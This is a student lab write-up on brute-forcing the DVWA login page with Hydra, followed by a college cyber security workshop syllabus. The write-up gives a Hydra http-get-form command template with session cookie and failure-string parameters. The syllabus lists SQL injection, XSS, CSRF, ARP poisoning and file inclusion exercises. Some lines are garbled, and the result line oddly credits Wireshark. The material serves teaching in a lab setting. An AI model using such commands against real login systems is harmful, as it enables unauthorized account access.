Brute forcing is a trial-and-error method attackers use to gain unauthorized access to systems or
information. It’s essentially trying every possible combination of passwords, encryption keys, or other
secrets until they find the right one.

Target
Login credentials

Methods

 Dictionary attacks: Trying common words, phrases, and combinations based on user information or known
password patterns.
 Rainbow tables: Pre-computed lists of millions of possible password hashes to quickly compare against target
hashes.
 Hybrid attacks: Combining dictionary attacks with brute force, testing variations of common passwords, or
using leaked data to personalize guesses.
 Credential stuffing: Automated tools attempt to use leaked credentials from other breaches to gain access to
various accounts.

Here we are going to use Hydra as a brute-forcing tool.

Hydra: Hydra is a powerful tool used for brute-forcing passwords and encryption keys. It’s known as a
multi-protocol login cracker, meaning it can attack various login services and protocols.

hydra [Link] -s 80 -L /path of username -P /path of password file wordlist -1 http-get-form “/URL of
page=Cookie:PHPSESSID=cookie value; security=low:F=Username and/or password incorrect.”

hydra command

 Uses Hydra, a tool for password cracking and brute-force attacks.

 Targets the local machine (IP address: [Link]) on port 80 (HTTP).
 Uses a list of usernames (/home/purnikaa/Desktop/users) and passwords
(/home/purnikaa/Desktop/passwords-1) for the atta

 ck.
  Attempts to crack a web login form located at [Link]
 Performs HTTP GET requests with modified username and password fields in each attempt.
 Continuously tries different combinations until it either finds a successful login or exhausts all
combinations.

After using this command we got a bunch of usernames and passwords.

Using any one of these we can log in for low and the same method can be done do, medium as well but it
is a few seconds late.

RESULT: This experiment successfully executed using wireshark.

 AJAY KUMAR GARG ENGINEERING COLLEGE, GHAZIABAD
Department of Computer Science & Engineering

LIST OF EXPERIMENTS
Course: [Link] Sem/Year:IV/II Subject Code: BCS453
Branch: CSE Subject Name: Cyber Security Workshop

COURSE OUTCOMES (CO)

At the end of the course student will be able to:
CO1: To capture & analyze network traffic, identify suspicious patterns and basic protocols like HTTP, DNS, and SMTP using
Wireshark.
CO2: Analyze command-and-control traffic and Simulate a scenario where a password is transmitted in plaintext using Wireshark.
CO3: Identify ARP poisoning attack & analyze and capture packet how the attack can lead to a Man-in-the-Middle scenario.
CO4: Demonstrate how an attacker can manipulate input fields to extract, modify, or delete database information using DVWA.
CO5: Exploit XSS and Explore remote and local file inclusion vulnerabilities in DVWA.

LIST OF EXPERIMENTS
Module 1: Packet Analysis using Wire shark
1. Basic Packet Inspection: Capture network traffic using Wire shark and analyze basic protocols like HTTP,
DNS, and SMTP to understand how data is transmitted and received.
2. Detecting Suspicious Activity: Analyze network traffic to identify suspicious patterns, such as repeated
connection attempts or unusual communication between hosts.
3. Malware Traffic Analysis: Analyze captured traffic to identify signs of malware communication, such as
command-and-control traffic or data infiltration.
4. Password Sniffing: Simulate a scenario where a password is transmitted in plaintext. Use Wireshark to
capture and analyze the packets to demonstrate the vulnerability and the importance of encryption.
5. ARP Poisoning Attack: Set up an ARP poisoning attack using tools like Ettercap. Analyze the captured
packets to understand how the attack can lead to a Man-in-the-Middle scenario..
Module 2: Web Application Security using DVWA
6. SQL Injection: Use DVWA to practice SQL injection attacks. Demonstrate how an attacker can
manipulate input fields to extract, modify, or delete database information.
7. Cross-Site Scripting (XSS): Exploit XSS vulnerabilities in DVWA to inject malicious scripts into web
pages. Show the potential impact of XSS attacks, such as stealing cookies or defacing websites.
8. Cross-Site Request Forgery (CSRF): Set up a CSRF attack in DVWA to demonstrate how attackers can
manipulate authenticated users into performing unintended actions.
9. File Inclusion Vulnerabilities: Explore remote and local file inclusion vulnerabilities in DVWA. Show
how attackers can include malicious files on a server and execute arbitrary code.
10. Brute-Force and Dictionary Attacks: Use DVWA to simulate login pages and demonstrate brute-force
and dictionary attacks against weak passwords. Emphasize the importance of strong password policies.
Value Added Programs:
1. To Study different types of Network cables (Copper and Fiber) and prepare cables (Straight and Cross)
to connect Two or more systems. Use crimping tool to connect jacks. Use LAN tester to connect the
cables.
2. Work with the commands Ping, Tracert, Ipconfig, pathping, telnet, ftp, getmac, ARP, Hostname, Nbtstat,
netdiag, and Nslookup.